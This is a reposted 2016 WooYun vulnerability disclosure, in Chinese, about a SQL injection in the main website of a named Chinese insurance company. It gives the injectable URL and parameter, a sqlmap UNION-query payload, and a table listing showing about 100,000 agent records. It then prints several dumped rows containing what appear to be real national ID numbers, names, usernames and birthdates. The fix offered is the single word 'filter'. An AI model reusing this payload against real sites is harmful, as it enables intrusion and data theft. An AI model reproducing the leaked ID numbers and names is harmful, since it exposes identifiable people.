神刀安全网

漏洞标题: 海航集团旗下扬子江保险主站存在SQL注入漏洞(10万保险经纪资料)

漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

海航集团旗下扬子江保险主站存在SQL注入漏洞(10万保险经纪资料)

详细说明:

网站

http://www.yrib.com/

注入点

http://www.yrib.com/richsafe_getNewsDetailById.action?id=10

漏洞证明:

证明

code 区域
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=10' UNION ALL SELECT NULL,CONCAT(0x7170717671,0x5061765a76757a6e5275,0x716b716b71),NULL,NULL#
---
[10:34:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[10:34:39] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[10:34:39] [INFO] fetching tables for database: 'richsafe'
Database: richsafe
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| tbl_faagent | 105693 |
| tbl_faagentpost | 49359 |
| tbl_fdcom | 30563 |
| tbl_fdsyslog | 4329 |
| tbl_interfacelog | 2705 |
| tbl_interfacelogparas | 2705 |
| tbl_fdcounty | 2589 |
| tbl_occupationcode | 971 |
| tbl_fadistribution | 889 |
| tbl_flemployerins_track | 698 |
| tbl_fmcalmodepams | 666 |
| ldcode | 455 |
| tbl_fxinpersonins | 391 |
| tbl_fcinsured | 346 |
| tbl_fdcity | 340 |
| tbl_foorderdetail | 335 |
| tbl_fouserorder | 335 |
| tbl_fcappnt | 327 |
| tbl_fccont | 327 |
| tbl_fcpol | 312 |
| tbl_fcprojectplan | 258 |
| tbl_message | 257 |
| tbl_fcconttoplan | 256 |
| tbl_fdmenugrptomenu | 156 |
| tbl_easypaytype | 154 |
| tbl_fofxotoattach | 151 |
| tbl_dxsendrecord | 138 |
| tbl_fdmenu | 123 |
| tbl_fxmedicalapp_sf | 80 |
| tbl_easypayoinfo | 58 |
| tbl_fdplan | 58 |
| tbl_fduserlog | 49 |
| tbl_fdplantopro | 48 |
| ldmenu | 46 |
| tbl_fdplanrisk | 46 |
| seqmysql | 44 |
| tbl_fmsupplier | 40 |
| tbl_fdroletomenugrp | 39 |
| tbl_fmproductplan | 39 |
| tbl_fdmenugrp | 36 |
| tbl_fmcalmode | 35 |
| tbl_fdpriovince | 31 |
| ldtaskrunlog | 28 |
| tbl_dxlabelmgt | 28 |
| tbl_roadrescue | 21 |
| tbl_uploadinfo | 21 |
| ldtaskplanaudit | 18 |
| lduser | 16 |
| ldtaskaudit | 14 |
| tbl_fmriskapp | 14 |
| latestinformation | 11 |
| tbl_fxmedicalapp_jb_sf | 10 |
| tbl_lwuser | 10 |
| tbl_lp_attch | 9 |
| tbl_commentinfo | 7 |
| tbl_dxmoduleconfig | 7 |
| tbl_interfaceinfo | 7 |
| tbl_interfaceinfoparas | 7 |
| ldtask | 5 |
| ldtaskplan | 5 |
| tbl_fduser | 5 |
| companyglory | 4 |
| tbl_fdhrcom | 4 |
| tbl_fmproductdef | 3 |
| tbl_ldrole | 3 |
| `dual` | 2 |
| recruitmentinformation | 2 |
| tbl_fiaccpass | 2 |
| tbl_ficustomeracc | 1 |
+-------------------------+---------+

code 区域
| 110105196501140037 | NULL   | NULL     | 1000000014 | 1   | 胡杰               | NULL  | 1     | NULL  | NULL   | NULL   | NULL   | 11444   | hujie     | 2014-03-04 | 1965-01-14 | NULL     | 001      | 17:29:03 | NULL     | NULL      | NULL      | NULL      | 2014-05-29 | 2000-12-26 | NULL       | NULL       | 15:44:26   | NULL       | NULL       | NULL        | NULL        | NULL        | NULL        | NULL        | 16591       | NULL        | NULL         | NULL         | NULL         | NULL         | NULL         | NULL         | NULL         | NULL          | NULL          | NULL          | NULL          | NULL           | NULL            | NULL            | NULL              |
| 110102194412022719 | NULL | NULL | 1000000016 | 1 | 王东辉 | NULL | 1 | NULL | NULL | NULL | NULL | 177 | dhui_wang | 2014-03-04 | 1944-12-02 | NULL | 001 | 13:38:14 | NULL | NULL | NULL | NULL | 2014-05-29 | 2001-06-04 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 2 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 110105196203067716 | NULL | NULL | 1000000018 | 1 | 郭海涌 | NULL | 1 | NULL | NULL | NULL | NULL | 12000 | hy_guo | 2014-03-04 | 1962-03-06 | NULL | 001 | 13:18:50 | NULL | NULL | NULL | NULL | 2014-05-29 | 1995-03-30 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 9 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 11010119640701053x | NULL | NULL | 1000000019 | 1 | 房丽民 | NULL | 1 | NULL | NULL | NULL | NULL | 6277 | lm_fang | 2014-03-04 | 1964-07-01 | NULL | 001 | 11:47:16 | NULL | NULL | NULL | NULL | 2014-08-11 | 1995-04-01 | NULL | NULL | 16:09:29 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 6222 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 12011019550814037X | NULL | NULL | 1000000023 | 1 | 孟庆贵 | NULL | 1 | NULL | NULL | NULL | NULL | 11759 | qg_meng | 2014-03-04 | 1955-08-14 | NULL | 001 | 15:14:52 | NULL | NULL | NULL | NULL | 2014-05-29 | 1999-11-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 11683 | NULL | NULL | NULL

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 海航集团旗下扬子江保险主站存在SQL注入漏洞(10万保险经纪资料)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址